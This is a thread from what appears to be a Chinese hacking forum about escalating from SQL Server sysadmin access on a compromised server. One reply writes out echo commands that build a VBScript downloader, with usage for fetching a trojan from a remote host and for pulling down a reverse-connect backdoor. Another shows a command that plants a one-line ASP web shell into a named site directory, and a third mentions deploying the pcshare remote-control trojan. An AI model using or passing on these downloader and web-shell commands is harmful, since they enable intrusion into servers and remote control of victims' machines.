29 12
发新话题
打印

[讨论]SA权限下的尴尬 无法突破

能执行CMD就行了。在CMD下输入以下代码

echo iLocal = LCase(WScript.Arguments(1)) >c:\down.vbs
echo iRemote = LCase(WScript.Arguments(0)) >>c:\down.vbs
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>c:\down.vbs
echo xPost.Open "GET",iRemote,0 >>c:\down.vbs
echo xPost.Send() >>c:\down.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>c:\down.vbs
echo sGet.Mode = 3 >>c:\down.vbs
echo sGet.Type = 1 >>c:\down.vbs
echo sGet.Open() >>c:\down.vbs
echo sGet.Write(xPost.responseBody) >>c:\down.vbs
echo sGet.SaveToFile iLocal,2 >>c:\down.vbs


用法c:\down.vbs http://www.xxx.com/xxx.exe(你的木马位置) c:\abc.exe(保存位置)
下载个反弹后门就行了。或者把一个下载着用Exe2bat把下载者转换成BAT文件。传上去。下载个后门就行了。

TOP

我用这条语句成功了:echo ^<%25execute^(request^("l"^)^)%25^> >"e:\Program Files\Eternity Science\SPIRIT专题学习网站\ct\ct.asp"
每个人都有属于自已的世界,人生因此而精彩,HACK就是我的世界!

TOP

我也碰到过这样的问题.什么命令都可以执行.我上传了pcshare以后执行不了.不管是用at.exe 还是用ws都无法执行上传的pcshare

TOP

引用:
这里是引用第[21 楼]easylun102006-03-12 16:43发表的:
那我还在一个台湾站上上传EXE文件 文件上去了可以看到结果下载时就说没有这个文件捏,。。。。
MIME类型
上次我上网查资料,突然弹出来一个网页,很黄很暴力,我赶紧给关了。

TOP

 29 12
发新话题